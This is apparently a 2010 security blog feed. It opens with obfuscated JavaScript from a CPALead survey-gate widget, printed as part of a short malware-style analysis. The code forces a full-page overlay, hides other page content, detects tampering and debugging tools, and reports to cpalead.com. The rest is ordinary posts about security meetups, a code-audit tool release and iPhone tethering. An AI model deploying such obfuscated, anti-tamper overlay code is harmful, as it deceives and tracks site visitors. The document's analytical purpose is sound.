var widgetJSON={"settings":[{"id":"OTM5ODQ=","opacity":"99","donation_widget":"0"},{"id":"NzMxNTM=","opacity":"50","donation_widget":"0"},{"id":"NzM5NTQ=","opacity":"30","donation_widget":"0"},{"id":"ODA1OTE=","opacity":"95","donation_widget":"0"}]};function getWidgetSetting(gateid,settingname){for(var x=0;x<widgetJSON.settings.length;x++){if(widgetJSON.settings[x].id==unescape(gateid)){return widgetJSON.settings[x][settingname]}}}var popup_delay='';var countdownStarted=false;var isloaded=true;var ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=false;var cbtonfugwctexmjdff8bd9e3648ab7=false;var bodyexisted=false;var bodyloadtime=0;var mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=0;var xwwjxyvbmsrjfpud17e9cae225420='ytndhhmwdjexjqej106a67d2';var gmgqvtjawhodlboj8b0d5f2c='Your attempt to disable this widget has been logged.';function addWidgetLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func}else{window.onload=function(){if(oldonload){try{oldonload()}catch(e){}}if(func){func()}}}}function checkForBody(gateid){var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);if(gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62==null){bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}else{myGatewayStart(gateid)}}function startGateway(gateid){if(popup_delay>0){bodyloadtime=bodyloadtime+popup_delay+'000';setTimeout("checkForBody('"+gateid+"');",popup_delay+'000')}else{bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}}function yecqogvnndwlktmu(onoroff){iframe_tags=document.getElementsByTagName('iframe');for(i=0;i!=iframe_tags.length;i++){if(iframe_tags[i].id!='wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831'){if(onoroff==0){iframe_tags[i].style.visibility='hidden'}if(onoroff==1){iframe_tags[i].style.visibility='visible'}}}}function jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(onoroff){var embeds=document.getElementsByTagName('embed');for(var ems=document.embeds,i=0,em;em=ems[i];i++){if(em.id!='video_controller'&&em.id!='video_bucket'){if(onoroff==0){if(navigator.appName=='Microsoft Internet Explorer'){em.setAttribute('wmode','transparent');em.style.visibility='hidden'}else{em.setAttribute('wmode','transparent');var nx=em.nextSibling,pn=em.parentNode;pn.removeChild(em);pn.insertBefore(em,nx)}}if(onoroff==1){em.setAttribute('wmode','window');if(navigator.appName=='Microsoft Internet Explorer'){em.style.visibility='visible'}}}}}function mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(onoroff){object_tags=document.getElementsByTagName('object');for(i=0;i!=object_tags.length;i++){if(object_tags[i].id!='video_controller'&&object_tags[i].id!='video_bucket'){if(onoroff==0){object_tags[i].setAttribute('wmode','transparent');object_tags[i].style.visibility='hidden'}if(onoroff==1){object_tags[i].style.visibility='visible';object_tags[i].setAttribute('wmode','window')}}}}function getPageSize(){var c,d;if(window.innerHeight&&window.scrollMaxY){c=window.innerWidth+window.scrollMaxX;d=window.innerHeight+window.scrollMaxY}else if(document.body.scrollHeight>document.body.offsetHeight){c=document.body.scrollWidth;d=document.body.scrollHeight}else{c=document.body.offsetWidth;d=document.body.offsetHeight}var a,b;if(self.innerHeight){a=document.documentElement.clientWidth?document.documentElement.clientWidth:self.innerWidth;b=self.innerHeight}else if(document.documentElement&&document.documentElement.clientHeight){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else if(document.body){a=document.body.clientWidth;b=document.body.clientHeight}pageHeight=d<b?b:d;pageWidth=c<a?c:a;return arrayPageSize=new Array(pageWidth,pageHeight,a,b)}function dontscroll(){var arrayPageSize=getPageSize();if((arrayPageSize[1]-document.getElementById('aijvqsnovujrsfoj3').style.height.replace("px",""))>30){document.getElementById('aijvqsnovujrsfoj3').style.height=(arrayPageSize[1]+'px')}if(mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e==0){setTimeout("dontscroll();",500)}}function mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(gateid,adixdgozwczhuvaf6e84b){if(adixdgozwczhuvaf6e84b!=xwwjxyvbmsrjfpud17e9cae225420){top.location.href='http://www.cpalead.com/adblock.php?pub=42138'}var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.getElementById('aijvqsnovujrsfoj3');var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(1);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(1);yecqogvnndwlktmu(1);mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=1;cbtonfugwctexmjdff8bd9e3648ab7=true;if(getWidgetSetting(gateid,'donation_widget')==1&&secondclose!=true){dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.filter="alpha(opacity=0)";dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.opacity="0.0";document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='http://www.surveysforcharity.org/thankyou-overlay.php';secondclose=true}else{zcpkmswwmxlgjzbue41a138882143252732d893.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='about:blank';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='none'}return false}function guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9(tampertype){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){if(window.console&&window.console.firebug){var hasfirebug=1}else{var hasfirebug=0}dpjfszjhzduviwkn424c2477e2d48=new Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper.php?pub=42138&firebug="+hasfirebug+"&tamper="+tampertype;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);sgfplcetedjsqmbvbbcb115()}}function ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69(reason){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){dpjfszjhzduviwkn424c2477e2d48=new Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper-test.php?pub=42138&reason="+reason;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73('http://www.cpalead.com/nostyle.php?pub=42138')}}function hienslexztaecvon972b4c6959457b72d8591114abeb305d(){if(!document.getElementById('aijvqsnovujrsfoj3')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-not-found')}else if(!document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-not-found')}else if(!document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-found')}else if(document.getElementById('aijvqsnovujrsfoj3').style.width!="100%"||document.getElementById('aijvqsnovujrsfoj3').style.display!="block"||document.getElementById('aijvqsnovujrsfoj3').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-styles')}else if(document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.width!="100%"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.display!="block"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-styles')}else if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display!="block"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-visible')}if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight<=300&&document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight!=0){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('iframe-height-invalid-'+document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight)}else if(document.getElementById('aijvqsnovujrsfoj3').offsetHeight<=100&&document.getElementById('aijvqsnovujrsfoj3').clientHeight<=100){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('overlay-height-invalid-'+document.getElementById('aijvqsnovujrsfoj3').offsetHeight+'-'+document.getElementById('aijvqsnovujrsfoj3').clientHeight)}setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d()",1000)}function sgfplcetedjsqmbvbbcb115(){var _0x96be=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x96be[1]][_0x96be[0]]()}function lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73(url){var _0xb500=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];top[_0xb500[1]][_0xb500[0]]=url}function loadGatewayIframe(gateid){document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').contentWindow.location.replace('http://www.cpalead.com/mygateway_iframe_loader.php?pub=42138&subid=203.45.56.190&gateid='+gateid+'&ref='+escape(document.referrer)+'')}function createOverlay(gateid){var arrayPageSize=getPageSize();var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.createElement("div");dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.setAttribute('id','aijvqsnovujrsfoj3');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.position='absolute';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.top='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.left='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.zIndex='11863836';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.width='100%';gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.insertBefore(dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5,gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.firstChild);opacity_setting_ie=getWidgetSetting(gateid,'opacity');opacity_setting_moz=opacity_setting_ie/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_ie+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz;dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.height=(arrayPageSize[1]+'px');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='block';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.visibility='visible'}function myGatewayStart(gateid){var closebuttons=['NzMxNTM%3D'];if(!document.getElementById('aijvqsnovujrsfoj3')){createOverlay(gateid)}else{if(document.getElementById('aijvqsnovujrsfoj3').style.display='none'){document.getElementById('aijvqsnovujrsfoj3').style.display='block';opacity_setting_moz=getWidgetSetting(gateid,'opacity')/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_moz+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz}}var arrayPageSize=getPageSize();dontscroll();jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(0);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(0);var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');zcpkmswwmxlgjzbue41a138882143252732d893.style.display='block';zcpkmswwmxlgjzbue41a138882143252732d893.style.visibility='visible';zcpkmswwmxlgjzbue41a138882143252732d893.style.position='absolute';zcpkmswwmxlgjzbue41a138882143252732d893.style.top='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.left='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.zIndex='11863846';zcpkmswwmxlgjzbue41a138882143252732d893.style.width='100%';var has_closebtn=0;for(var i=0;i<closebuttons.length;i++){if(closebuttons[i]==gateid||closebuttons[i]==escape(gateid)){var is_donation=getWidgetSetting(gateid,'donation_widget');if(is_donation==1){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/rice-widget/rice-skin-close-button.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}else{document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/help/close_btn.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}var has_closebtn=1;found=i;break}}if(has_closebtn==0){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML=''}zcpkmswwmxlgjzbue41a138882143252732d893.style.height=(arrayPageSize[1]+'px');setTimeout("loadGatewayIframe('"+gateid+"');",500);document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='block';ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=true;setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d();",5000)}function secondpass(){countdown=countdown-1;document.getElementById("closelink").innerHTML=countdown;if(countdown<=0){riunpfcaxfcggjhpf()}else{setTimeout("secondpass()",1000)}}document.write('<style type="text/css">#aijvqsnovujrsfoj3{background-color: #000; filter:alpha(opacity=80); opacity: 0.80; -moz-opacity: 0.80;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a {background:none;font-weight:normal;color:#fff;text-decoration:none}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 img {border: 0px;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a:hover {background:none;font-weight:normal;color:#fff;text-decoration:underline}</style>');document.write('<div id="wzjyzgbhqzohhlhvef8426b5a89be2" style="display:none; text-align: center; line-height: normal; ">');document.write('<div id="lpepmphihufelzdd28c18f8093587772fdd38f" align="center" style="position: absolute; width: 100%; z-index: 11863866;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div id="arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c" align="center" style="position: absolute; width: 100%; z-index: 11863936;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div style="margin: 72px auto 0px; background: transparent; height: 482px; z-index: 11863881;">');document.write('<iframe width="100%" height="640" id="wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831" src="" allowtransparency="true" frameborder="0" style="position: relative; height: 640px; overflow-x: hidden; overflow-y: hidden; background-color: transparent; z-index: 11863886; " scrollbars="NO"></iframe>');document.write('</div></div>');
The next steps would be far to time consuming for me given the glaringly obvious conclusion you can draw by googleing for cpalead or http://www.cpalead.com/mygateway_iframe_loader.php. In conclusion there isn't anything new here. The techniques aren't very advanced, but god enough to keep the general public ignorant of what's really going on. I did find the firebug / anti tamper code used in the last bit of js interesting, but I'm sure that malware analysts have seen it thousands of times before.]]> June 2010 Ruxcon Melbourne Monthly Meetup tag:www.justanotherhacker.com,2010://1.156 2010-06-08T01:54:59Z 2010-06-08T01:57:47Z I am presenting at this months Ruxcon Monthly Meetup.Date: Friday, 25th JuneTime: 6:00PMLocation: RMIT University, City Campushttps://my.rmit.edu.au/portal/page/portal/RMITPortal/campusmaps?dsize=maxRoom: Building 8, Level 9, Room 42 (008.09.042)RMIT Building 8 entrance is off Swanston Street (just past Swanston and La Trobe). Please take the... Eldar Marcussen http://www.justanotherhacker.com 
Date: Friday, 25th June
Time: 6:00PM
Location: RMIT University, City Campus
https://my.rmit.edu.au/portal/page/portal/RMITPortal/campusmaps?dsize=max
Room: Building 8, Level 9, Room 42 (008.09.042)

RMIT Building 8 entrance is off Swanston Street (just past Swanston and 
La Trobe). Please take the lift to Level 9 and make your way to Room 42. 
We will have directions posted up in the building.

Presentations
=============

Unsanitary Web Activities - Tim Noise (MovingData)

In the land of the internet, web developers are constantly rolling out 
new applications and letting them free into the Internet. Many with 
little knowledge or experience in security. They assume the users will 
provide data in a manner they expect. This talk will cover webapp 
security basics and commonplace attacks, showing you the effect this 
oversight can have, and how to prevent it.

Pownage Coquillage: Real World Tales From The Trenches - Sash Biskup  
(Stratsec)

In this talk the presenter will discuss various security incidents he 
has been involved in during the course of his career.  Starting with old 
school bof through to modern day malware and blackmail.  This isn't a 
deep technical analysis of each incident but an overview of the 
charateristics of each of the attacks and what the repurcussions were to 
the organisation or individual.

Static analysis with Graudit - Eldar Marcussen

Graudit is a rough audit tool, that can be used to find vulnerabilities 
in source code (C, ASP, .NET, JSP, PHP, Perl and Python). In this 
presentation I will show how to get the most out of graudit.

]]> Graudit version 1.6 released tag:www.justanotherhacker.com,2010://1.155 2010-05-14T11:48:55Z 2010-07-08T10:21:41Z After a short hiatus I am happy to deliver the next graudit release. Version 1.6 introduces three new databases, c, dotnet and "all". The all database is a combined database of all the distributed signatures so you can easier scan... Eldar Marcussen http://www.justanotherhacker.com
You can download the latest version from the graudit download page.
Please note that with the current changes to the test suite there is no development (.src.tar.gz) release. If you are a package maintainer or otherwise wish to use the development release you can either clone the git repository or wait for the upcoming 1.7 release.
]]> USB Iphone tethering for Ubuntu - No jailbreak tag:www.justanotherhacker.com,2010://1.152 2010-04-20T03:14:02Z 2010-05-03T04:49:41Z Since my iphone is a company phone, jailbreak was never an option. I'm surprised to see the amount of terrible "tether your iphone by jailbreaking it" guides there is out there. I suppose at some stage there was no decent... Eldar Marcussen http://www.justanotherhacker.com
First we add the third party repository and update the apt cache (this has security implications, so don't cry if your wall paper suddenly changes to tubgirl): 
    sudo add-apt-repository ppa:pmcenery/ppa
    sudo apt-get update
Then we install the required modules (accept the dependencies): 
    sudo apt-get install gvfs ipheth-utils
This will install and insmod the ipheth driver. Make sure that internet sharing is enabled on your iphone and plug it in. It should show up as a wired connection. If something went wrong check your dmesg. I have experience timeouts on TX which caused it not to initialize. Replugging did the trick. ]]> From xss to root - the apache post mortem tag:www.justanotherhacker.com,2010://1.150 2010-04-15T11:10:09Z 2010-05-24T00:29:10Z In the spirit of openness the Apache foundation has released an excellent post mortem write up of their recent compromise. It started with a XSS attack leveraged through the issue tracking software they use (JIRA) and ended with complete root... Eldar Marcussen http://www.justanotherhacker.com
Read the entire story at https://blogs.apache.org/infra/entry/apache_org_04_09_2010
]]> Ruxcon Melbourne Monthly Meetup tag:www.justanotherhacker.com,2010://1.148 2010-04-08T11:21:41Z 2010-04-27T23:59:09Z From Chris Spencer on the ruxcon mailing list: As part of a new initiative, the Ruxcon Team in conjunction with RMIT Information Security Collective, have established a monthly meeting in Melbourne. The aim of the meeting is to encourage individuals... Eldar Marcussen http://www.justanotherhacker.com From Chris Spencer on the ruxcon mailing list:

As part of a new initiative, the Ruxcon Team in conjunction with RMIT Information Security Collective, have established a monthly meeting in Melbourne. The aim of the meeting is to encourage individuals to perform a short presentation on computer security or a related topic in front of a small audience. The monthly meetings are open to everyone and free to attend.

The presentations are intended to be short (between 5-20 minutes), a projector and screen will be provided. We encourage participation from everyone and hope to see a variety of presentations over the coming months. Any topic is welcome, a presentation could be as simple as speaking for 5 minutes about a project you are currently working on, or day to day work tasks within your given field.

If you are interested in participating please email us at ruxcon ruxcon org au.

Please join us on Friday and help make the kickoff a success!

Details for the kickoff:

Date: Friday, 23rd April
Time: 6:00pm
Location: RMIT University, City Campus
https://my.rmit.edu.au/portal/page/portal/RMITPortal/campusmaps?dsize=max
Room 008.09.041 (Building 8, Level 9, Room 41)

Presentations:

  • SQL Injections 101 - Louis Nyffenegger (@snyff)
  • Malware Analysis for Incident Response - Ash Fox
  • Binary Analysis Basics - Chris Spencer
]]> Tool review: Bugle tag:www.justanotherhacker.com,2010://1.134 2010-04-07T12:43:55Z 2010-04-08T11:59:05Z Bugle is a neat tool which uses google and regular expressions to detect security defects in code. It makes it super quick to find vulnerable code.The downside is that the code is often old and the vulnerability has been found,... Eldar Marcussen http://www.justanotherhacker.com Bugle is a neat tool which uses google and regular expressions to detect security defects in code. It makes it super quick to find vulnerable code.

The downside is that the code is often old and the vulnerability has been found, disclosed and fixed. And checking all those hits take time. Still it is well worth a spin.

Disclaimer:
Bugle's use of regular expressions to locate code defects was what initially prompted me to organize my messy scripts into the open source script graudit
]]> Ruxcon 2010 tag:www.justanotherhacker.com,2010://1.147 2010-03-31T05:11:48Z 2010-03-31T05:41:23Z Eldar Marcussen http://www.justanotherhacker.com
Please see http://www.ruxcon.org.au for more details.
]]> Post mortems - Wargames tag:www.justanotherhacker.com,2010://1.146 2010-03-23T03:01:10Z 2010-03-31T05:59:26Z With smpCTF looming I thought I would link to these excellent "post mortems" from CCDC 2010 and Reiners exploiting past sql filters, something we have seen in the last two codegate and owaspeu10 challenges...CCDC 2010 - Part1CCDC 2010 - Part... Eldar Marcussen http://www.justanotherhacker.com smpCTF looming I thought I would link to these excellent "post mortems" from
CCDC 2010 and Reiners exploiting past sql filters, something we have seen in the last two codegate and owaspeu10 challenges...
CCDC 2010 - Part1
CCDC 2010 - Part 2
Reiners - Exploitiing hard filtered sql injection article]]> password cracking, dictionary attack statistics tag:www.justanotherhacker.com,2010://1.144 2010-03-22T20:30:47Z 2010-06-11T03:22:35Z Ron Bowes did an analysis of the rockyou.com passwords to see what the number of accounts you would nab with the top X number of passwords. This shows how a bigger password list has diminishing returns. He has made the... Eldar Marcussen http://www.justanotherhacker.com
password-coverage.png
He has made the top X password dictionary files and other password lists available in his wiki at http://www.skullsecurity.org/wiki/index.php/Passwords. I you want more details you can read the whole article at http://www.skullsecurity.org/blog/?p=516


]]> smp Capture The Flag (CTF) 2010 Hacker Olympics tag:www.justanotherhacker.com,2010://1.145 2010-03-18T02:52:48Z 2010-07-23T00:23:07Z smp Capture The Flag (CTF), 2010 Hacker Olympics, is a contest designed by "hackers" and "security enthusiasts" for the like to battle it out against each other over a highly sugar induced weekend. In the smpCTF Hacker Olympics teams and... Eldar Marcussen http://www.justanotherhacker.com
Do you have what it takes to compete...?

More details at http://www.smpctf.com/ dates and times have not yet been decided.

]]>